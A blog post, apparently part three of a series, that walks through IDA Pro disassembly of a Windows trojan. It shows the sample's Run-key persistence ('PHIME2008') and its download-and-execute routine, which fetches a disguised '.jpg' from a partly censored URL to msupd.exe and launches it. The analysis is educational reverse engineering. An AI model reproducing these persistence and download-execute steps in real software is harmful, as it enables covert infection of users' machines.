Examining a piece of malware for strings (sequences of printable characters) can reveal a few clues about what the malware does, or what it is capable of doing. Part two predicted the behaviour of some functions, based on which strings they referenced. Part three will start to disassemble these functions to see how closely the predicted behaviour matches their actual behaviour.
Loading the malware sample into the free edition of IDA Pro again, I disassembled the functions identified in part two. I shall only show the parts of the code that reference the strings found in part one, otherwise this blog article would be even longer.
_WinMain@16()
Let’s start with WinMain, as that will be where the main program flow starts (after the runtime initialisation code, etc.). We have seen that the _WinMain@16() function references the following strings:
PHIME2008
Software\Microsoft\Windows\CurrentVersion\Run
/SYNC
_WinMain@16() starts off by calling WSAStartup() to initialise the Winsock (Windows Sockets) subsystem (remember when you had to install third party software called ‘Trumpet Winsock’!?), and then gets down to business with the following:
.text:0040101B push 104h ; nSize
.text:00401020 push offset ExistingFileName ; lpFilename
.text:00401025 push 0 ; hModule
.text:00401027 call ds:GetModuleFileNameA
It is calling the Win32 API function GetModuleFileName() with the hModule parameter (the first one) equal to NULL. This will return the path (directory/folder and file name) of the executable file that started the current process.
The malware then uses a couple of the ‘repeat’ instruction prefixes (‘rep’ and ‘repne’) with the ‘scas’ (scan string) and ‘movs’ (move string) instructions, to append the string ‘ /SYNC’ to the file name returned by the GetModuleFileNameA() call. This is starting to look like a command line.
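For readers less familiar with the x86 string instructions, the append can be modelled in a few lines of Python. This is only a sketch of the idiom, not a transcription of the sample's code: the function name and the example path are made up for illustration, and I am assuming the usual compiler pattern in which ‘repne scasb’ finds the terminating NUL, ‘rep movsd’ copies whole 4-byte words, and ‘and ecx, 3’ followed by ‘rep movsb’ copies the remaining 0 to 3 bytes.

```python
def append_cstring(buf: bytearray, suffix: bytes) -> int:
    """Append a NUL-terminated suffix to the C string held in buf.

    Returns the length of the resulting string, excluding the NUL.
    """
    src = suffix + b"\x00"          # the copy includes the terminator

    # 'repne scasb' with al = 0: scan forward until the NUL is found.
    end = buf.index(0)
    if end + len(src) > len(buf):
        raise ValueError("buffer too small")

    # 'rep movsd' (assumed): copy as many whole 4-byte words as possible.
    dwords = len(src) >> 2
    for i in range(dwords):
        buf[end + 4 * i : end + 4 * i + 4] = src[4 * i : 4 * i + 4]

    # 'and ecx, 3' then 'rep movsb': copy the 0 to 3 bytes left over.
    tail = len(src) & 3
    done = 4 * dwords
    buf[end + done : end + done + tail] = src[done : done + tail]

    return end + len(src) - 1


# Hypothetical path, standing in for what GetModuleFileNameA() returned.
buf = bytearray(0x104)
buf[:13] = b"C:\\sample.exe"
length = append_cstring(buf, b" /SYNC")
command_line = bytes(buf[:length]).decode("ascii")
```

The buffer size of 0x104 matches the nSize value pushed before the GetModuleFileNameA() call; everything else here is illustrative.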
.text:00401090 lea eax, [esp+5A4h+hKey]
.text:00401094 mov ecx, ebx
.text:00401096 push eax ; phkResult
.text:00401097 push 0 ; lpSecurityAttributes
.text:00401099 push 0F003Fh ; samDesired
.text:0040109E push 0 ; dwOptions
.text:004010A0 push 0 ; lpClass
.text:004010A2 and ecx, 3
.text:004010A5 push 0 ; Reserved
.text:004010A7 push offset SubKey ; "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
.text:004010AC rep movsb
.text:004010AE push HKEY_LOCAL_MACHINE ; hKey
.text:004010B3 call ds:RegCreateKeyExA
Here, the RegCreateKeyEx() Win32 API function is called to create (or, if it already exists, simply open) the ‘HKLM\Software\Microsoft\Windows\CurrentVersion\Run’ registry key. This registry key specifies a list of processes/applications/commands to start/run when Windows starts, and is one of the methods that malware uses to achieve persistence. That is, it enables the malware to survive a reboot.
Without persistence, the malware process(es), just like normal application processes, would be killed when Windows shuts down, and wouldn’t start up again until started by a user. Not the kind of thing that you want if you are trying to run and remain undetected by the user.
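Going back to the RegCreateKeyExA() call for a moment, the samDesired value of 0F003Fh is worth decoding. The sketch below breaks the mask into the access-right constants from the Windows SDK headers; the helper name decode_sam() is mine, and the constant values are quoted from winnt.h as I understand them, so do check them against your own headers.

```python
# Registry access-right constants as defined in the Windows SDK (winnt.h).
KEY_RIGHTS = {
    0x0001: "KEY_QUERY_VALUE",
    0x0002: "KEY_SET_VALUE",
    0x0004: "KEY_CREATE_SUB_KEY",
    0x0008: "KEY_ENUMERATE_SUB_KEYS",
    0x0010: "KEY_NOTIFY",
    0x0020: "KEY_CREATE_LINK",
}
STANDARD_RIGHTS_REQUIRED = 0x000F0000
KEY_ALL_ACCESS = 0x000F003F


def decode_sam(mask: int) -> list:
    """Return the names of the access rights that are set in mask."""
    names = [name for bit, name in KEY_RIGHTS.items() if mask & bit]
    if mask & STANDARD_RIGHTS_REQUIRED == STANDARD_RIGHTS_REQUIRED:
        names.append("STANDARD_RIGHTS_REQUIRED")
    return names


rights = decode_sam(0xF003F)
```

Every right in the table is set, which is what KEY_ALL_ACCESS means. The malware only needs KEY_SET_VALUE to write its value, so asking for everything looks like convenience rather than necessity.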
.text:004010B9 lea ecx, [esp+5A0h+Data]
.text:004010BD push ecx ; lpString
.text:004010BE call ds:lstrlenA
.text:004010C4 inc eax
.text:004010C5 lea edx, [esp+5A0h+Data]
.text:004010C9 push eax ; cbData
.text:004010CA mov eax, [esp+5A4h+hKey]
.text:004010CE push edx ; lpData
.text:004010CF push REG_SZ ; dwType
.text:004010D1 push 0 ; Reserved
.text:004010D3 push offset ValueName ; "PHIME2008"
.text:004010D8 push eax ; hKey
.text:004010D9 call ds:RegSetValueExA
The ‘HKLM\Software\Microsoft\Windows\CurrentVersion\Run’ registry key contains one registry value (a name with associated data) for each application/process/command that is to be started when Windows starts up.
This code fragment is calling lstrlen() to determine the length of the string in the variable that IDA Pro has labelled ‘Data’. The malware is calculating the length of the string because the length needs to be passed to the RegSetValueEx() function. The ‘inc eax’ adds one to that length, because lstrlen() does not count the terminating null character, whereas the size passed for a REG_SZ value should include it.
Here the malware goes on to call RegSetValueEx() to create a value called ‘PHIME2008’, and the data that it is assigning to this value is in the Data variable. This variable is where the process’ executable file name was copied to, along with the ‘ /SYNC’ string. In other words, this will cause Windows to load the malware on start up, and pass it the ‘/SYNC’ command line argument. This argument is probably used to inform the malware that it is running as part of system start up, rather than running to infect the system.
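To make the end result concrete, here is a small Python sketch of what ends up in the registry. The function name and the example path are hypothetical; only the value name, the ‘ /SYNC’ suffix and the length calculation come from the disassembly.

```python
def run_value(module_path: str, argument: str = "/SYNC"):
    """Return (value name, data, cbData) as the calls above would set them."""
    data = module_path + " " + argument
    # lstrlenA() excludes the terminating NUL; the 'inc eax' adds it back,
    # because cbData for a REG_SZ value should include the terminator.
    cb_data = len(data.encode("ascii")) + 1
    return "PHIME2008", data, cb_data


# Hypothetical install location, for illustration only.
name, data, cb_data = run_value("C:\\sample.exe")
```

On an infected machine, looking for a value called ‘PHIME2008’ under the Run key would therefore be a quick first check.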
WinMain() then calls the sub_401eb0() function, and uses its return value as the only parameter to sub_401c40(). It then gets a tad over-excited and creates 100 threads, at 13ms intervals, with each thread running sub_401870(), before sitting in an infinite Sleep(), calling WSACleanup() to free Winsock resources, and exiting.
sub_401eb0()
Since sub_401eb0() is the first malware function called by WinMain(), let’s look at it next. To recap, it references the following strings:
URLDownloadToFileA
DeleteUrlCacheEntry
http://[censored].jp/updata/ACCl3.jpg
urlmon.dll
wininet.dll
\msupd.exe
sub_401eb0() starts by initialising a number of variables to 0, before running the following code fragment:
.text:00401F09 lea ecx, [esp+268h+CommandLine]
.text:00401F0D mov [esp+268h+hObject], ebx
.text:00401F11 push ecx ; lpBuffer
.text:00401F12 stosb
.text:00401F13 call ds:GetSystemDirectoryA
The second parameter to GetSystemDirectory(), ‘uSize’, was pushed just before this code segment, in amongst some of the variable initialisation code. uSize was set to 0x400 (1024 in decimal) bytes. So here we have a buffer of 1024 bytes (which IDA Pro has called ‘CommandLine’), which should get populated with the path of the system directory.
.text:00401F19 lea edx, [esp+264h+CommandLine]
.text:00401F1D push offset aMsupd_exe ; "\\msupd.exe"
.text:00401F22 push edx ; lpString1
.text:00401F23 call ds:lstrcatA
This fragment calls lstrcat() (string concatenate) to append the string ‘\msupd.exe’ to the path of the system directory in the CommandLine variable.
.text:00401F29 lea eax, [esp+264h+CommandLine]
.text:00401F2D push ebx ; iReadWrite
.text:00401F2E push eax ; lpPathName
.text:00401F2F call ds:_lopen
.text:00401F35 cmp eax, HFILE_ERROR
.text:00401F38 jz short loc_401F4E
.text:00401F3A push eax ; hFile
.text:00401F3B call ds:_lclose
The malware is now checking to see if it can open the file <systemdir>\msupd.exe (the value in the CommandLine variable). The value of the ebx register at this point is 0 (it hasn’t been modified since being zeroed using ‘xor ebx,ebx’).
An Internet search for documentation on the _lopen() call reveals that the ‘iReadWrite’ parameter can be one of OF_READ, OF_READWRITE, or OF_WRITE, and that it can also be combined (using a bitwise ‘or’) with one of five OF_SHARE_* constants.
This is where it is handy to have some Win32 include files. These include files should be included with a Win32 SDK (Software Development Kit), which in my case is the GNU C compiler (as a cross compiler for MinGW32) on Linux.
I am looking for a constant starting with ‘OF_’, that is defined as being ‘0’ (as ebx is 0 when it is used as the second parameter to _lopen()), so I issue the following grep command (the name comes from the ed editor command ‘g/re/p’: globally search for a regular expression and print):
grep " OF_.*0$" *.h
The regular expression (search string, basically) has a space at the start, as I am looking for lines with ‘#define OF_’ and can’t be bothered including the ‘#define ’ in the regular expression. Also, if I did, I would be limiting the number of spaces to one, unless I also included an asterisk.
The ‘.*’ matches zero or more occurrences of any character, the ‘0’ matches a ‘0’ (funnily enough), and the ‘$’ matches the end of a line (doesn’t a ‘$’ always remind you of the end of a line!?).
The leading space is to stop the regular expression from matching constants that have the string ‘OF_’ in the middle of them (like ‘IMAGE_SIZEOF_SYMBOL’, for instance). Anyway, enough about grep.
$ grep " OF_.*0$" *.h
winbase.h:#define OF_READ 0
winbase.h:#define OF_SHARE_COMPAT 0
That grep command shows that the include file ‘winbase.h’ defines both OF_READ and OF_SHARE_COMPAT as being ‘0’. That tells us that the second parameter to the _lopen() call is equivalent to ‘OF_READ | OF_SHARE_COMPAT’.
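If you don’t have grep to hand, the same search can be reproduced with Python’s re module. This is a sketch only: the header lines below are a hand-picked sample rather than the contents of a real include file, although the values shown are the ones I would expect to find in the Windows headers.

```python
import re

# The same pattern that was passed to grep.
PATTERN = re.compile(r" OF_.*0$")

# Sample header lines (illustrative; real headers contain many more).
header_lines = [
    "#define OF_READ 0",
    "#define OF_WRITE 1",
    "#define OF_READWRITE 2",
    "#define OF_SHARE_COMPAT 0",
    "#define IMAGE_SIZEOF_SECTION_HEADER 40",
]

matches = [line for line in header_lines if PATTERN.search(line)]

# Both matching constants are 0, so OR-ing them together is still 0,
# which is the value in ebx when _lopen() is called.
OF_READ = 0
OF_SHARE_COMPAT = 0
i_read_write = OF_READ | OF_SHARE_COMPAT
```

The IMAGE_SIZEOF_SECTION_HEADER line ends in ‘0’ and contains ‘OF_’, but it is rejected because there is no space immediately before the ‘OF_’.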
If the _lopen() call does not return the HFILE_ERROR error code, then the function closes the file and returns 0. It looks like the malware is using the _lopen() call to determine whether or not the <systemdir>\msupd.exe file exists.
If the _lopen() call fails with HFILE_ERROR, then the function continues, and here we see another one of the strings that we identified:
.text:00401F4E lea ecx, [esp+264h+String1]
.text:00401F55 push offset aHttpURL_jpUp ; "http://[censored].jp/updata/ACCl3.jpg"
.text:00401F5A push ecx ; lpString1
.text:00401F5B call ds:lstrcpyA
An HTTP URL is copied (using lstrcpy()) into a variable that IDA Pro has called ‘String1’.
.text:00401F61 mov ebp, ds:LoadLibraryA
.text:00401F67 push offset LibFileName ; "wininet.dll"
.text:00401F6C call ebp ; LoadLibraryA
.text:00401F6E mov esi, eax
.text:00401F70 cmp esi, ebx
.text:00401F72 jnz short loc_401F84
LoadLibrary() is used to load ‘wininet.dll’. The return value (which Win32 API documentation tells us is a handle to the loaded module) is checked and if it is NULL (that is, the LoadLibrary() call failed), sub_401eb0() returns -2 (0xfffffffe). Negative values are often returned from functions in order to indicate an error condition.
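When reading return values in a disassembler or debugger, it helps to be able to switch between the signed value and the 32-bit pattern that actually sits in eax. The two helper functions below are my own, written as a minimal sketch of the two's complement conversion.

```python
def to_u32(value: int) -> int:
    """Signed value as the 32-bit pattern seen in a register."""
    return value & 0xFFFFFFFF


def to_i32(value: int) -> int:
    """32-bit pattern interpreted as a signed integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value
```

For instance, to_u32(-2) gives 0xfffffffe, and to_i32(0xfffffffe) gives -2 again.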
.text:00401F84 push offset ProcName ; "DeleteUrlCacheEntry"
.text:00401F89 push esi ; hModule
.text:00401F8A call ds:GetProcAddress
.text:00401F90 cmp eax, ebx
.text:00401F92 jnz short loc_401FAB
This code fragment calls GetProcAddress() using the module handle returned from the previous LoadLibrary() call, and another string ‘DeleteUrlCacheEntry’, to find the address of the DeleteUrlCacheEntry() Win32 function. The return value (the function address) is checked and, if NULL (indicating that the GetProcAddress() call failed), sub_401eb0() calls FreeLibrary() to unload the ‘wininet.dll’ library, and then returns -2.
.text:00401FAB lea edx, [esp+264h+String1]
.text:00401FB2 push edx
.text:00401FB3 call eax
Here sub_401eb0() calls DeleteUrlCacheEntry() (as its address is still in the eax register after returning from GetProcAddress()), with the ‘String1’ variable as its parameter. In other words, it will delete any locally cached copy of the URL.
It then calls LoadLibrary() to load ‘urlmon.dll’, and GetProcAddress() to get the address of ‘URLDownloadToFile()’ (which is a pretty self-explanatory function name). Again, it unloads the library and returns -2 if either the LoadLibrary() or the GetProcAddress() call fails.
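This load-by-name, look-up-by-name pattern is why the API names turned up as plain strings in part one rather than only in the import table. As a loose analogy (it is Python, not Win32, and the module and function names are arbitrary examples), the same shape looks like this:

```python
import importlib


def resolve(module_name: str, function_name: str):
    """Look a function up by name at run time; return None on failure."""
    try:
        module = importlib.import_module(module_name)   # cf. LoadLibrary()
    except ImportError:
        return None
    return getattr(module, function_name, None)         # cf. GetProcAddress()


sqrt = resolve("math", "sqrt")
missing = resolve("math", "no_such_function")
```

As in the malware, the caller has to check for a null result at both stages before calling through the returned value.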
.text:00401FFE push ebx ; lpfnCallback
.text:00401FFF lea ecx, [esp+268h+CommandLine]
.text:00402003 push ebx ; dwReserved
.text:00402004 lea edx, [esp+26Ch+String1]
.text:0040200B push ecx ; szFilename
.text:0040200C push edx ; szUrl
.text:0040200D push ebx ; NULL
.text:0040200E call eax ; URLDownloadToFile()
Bingo. The ‘http://[censored].jp/updata/ACCl3.jpg’ URL is downloaded to <systemdir>\msupd.exe. I don’t know about you, but I’m starting to suspect that ‘ACCl3.jpg’ may not actually be the picture of cute fluffy kittens that I was hoping for. The sub_401eb0() function then calls FreeLibrary() to unload urlmon.dll, and if the URLDownloadToFile() call failed, it returns -1 (0xffffffff).
.text:00402027 lea eax, [esp+264h+hObject]
.text:0040202B lea ecx, [esp+264h+StartupInfo]
.text:0040202F push eax ; lpProcessInformation
.text:00402030 push ecx ; lpStartupInfo
.text:00402031 push ebx ; lpCurrentDirectory
.text:00402032 push ebx ; lpEnvironment
.text:00402033 push ebx ; dwCreationFlags
.text:00402034 push ebx ; bInheritHandles
.text:00402035 push ebx ; lpThreadAttributes
.text:00402036 lea edx, [esp+280h+CommandLine]
.text:0040203D push ebx ; lpProcessAttributes
.text:0040203E push edx ; lpCommandLine
.text:0040203F push ebx ; lpApplicationName
.text:00402040 mov [esp+28Ch+StartupInfo.cb], 44h
.text:00402048 call ds:CreateProcessA
.text:0040204E test eax, eax
Here we go, this is where we can really suspect that the ‘ACCl3.jpg’ file may actually be an executable file rather than an image file (the file name extension of ‘.jpg’ suggests that the file is a type of image). The ebx register is still 0 at this point, so most of those parameters are 0 or NULL.
The address of the ‘hObject’ variable is passed in as the lpProcessInformation parameter. The CreateProcess() function will populate a ProcessInformation data structure starting at this address, with information about the newly created process.
The lpCommandLine parameter is the address of our ‘CommandLine’ variable, and the lpStartupInfo parameter contains the address of a StartupInfo structure which was initialised to 0 at the start of sub_401eb0(). The StartupInfo.cb element, which indicates the size of the structure, is initialised to 0x44 (68 bytes).
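The 0x44 figure can be sanity-checked by adding up the fields of the structure. The sketch below uses Python’s struct module and assumes the 32-bit ANSI layout of STARTUPINFO and PROCESS_INFORMATION as documented in the Windows SDK, where DWORDs, pointers and HANDLEs are all four bytes; the variable names are mine.

```python
import struct

# 32-bit layout: DWORD, pointers and HANDLEs are 4 bytes ("I"), WORD is 2 ("H").
# "<" selects little-endian with no implicit padding.
STARTUPINFOA_32 = struct.Struct(
    "<"
    "I"    # cb
    "3I"   # lpReserved, lpDesktop, lpTitle
    "8I"   # dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars,
           # dwFillAttribute, dwFlags
    "2H"   # wShowWindow, cbReserved2
    "I"    # lpReserved2
    "3I"   # hStdInput, hStdOutput, hStdError
)

# hProcess, hThread, dwProcessId, dwThreadId
PROCESS_INFORMATION_32 = struct.Struct("<2I2I")
```

The first structure comes out at 68 bytes, matching the value written to StartupInfo.cb. The first member of the second structure is hProcess, which would explain why IDA Pro has labelled the start of it ‘hObject’ (presumably because it is later passed to CloseHandle()).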
If the CreateProcess() function fails, it will return 0, in which case sub_401eb0() returns 0. Otherwise, it closes handles, and then returns 1.
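Pulling the return values together, the behaviour of sub_401eb0() as described above can be summarised in a short Python model. The function and its boolean parameters are hypothetical stand-ins for the outcome of each API call; this is my reading of the control flow, not decompiler output.

```python
def sub_401eb0_model(file_exists, wininet_ok, urlmon_ok,
                     download_ok, process_ok):
    """Return code of sub_401eb0() for a given combination of outcomes."""
    if file_exists:          # _lopen() succeeded: msupd.exe is already there
        return 0
    if not wininet_ok:       # LoadLibrary()/GetProcAddress() on wininet.dll
        return -2
    if not urlmon_ok:        # LoadLibrary()/GetProcAddress() on urlmon.dll
        return -2
    if not download_ok:      # URLDownloadToFile() failed
        return -1
    if not process_ok:       # CreateProcess() returned 0
        return 0
    return 1                 # msupd.exe downloaded and started
```

One thing the model makes obvious is that a return value of 0 is ambiguous: it can mean either that msupd.exe was already present, or that the download worked but the new process could not be started.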
I shall keep you in suspense at this point, as this article is getting quite long, and the second function called from WinMain(), sub_401c40(), has quite a bit to it, so I shall save that for part four.
Where are we up to? We have identified that WinMain() does indeed install a registry entry so that it will get started when Windows starts up, and we have confirmed that sub_401eb0() downloads http://[censored].jp/updata/ACCl3.jpg to msupd.exe (in the Windows system directory).
Does sub_401c40() actually leak information (as the updata in the URL, along with the HTTP query string, suggest) and if so, what information does it leak; and what do the three functions called by sub_401c40() actually do (I can tell you now, it’s not about to help you manage your financial accounts)? Tune in to part four where I shall attempt to answer those questions, without creating a ridiculously long blog entry.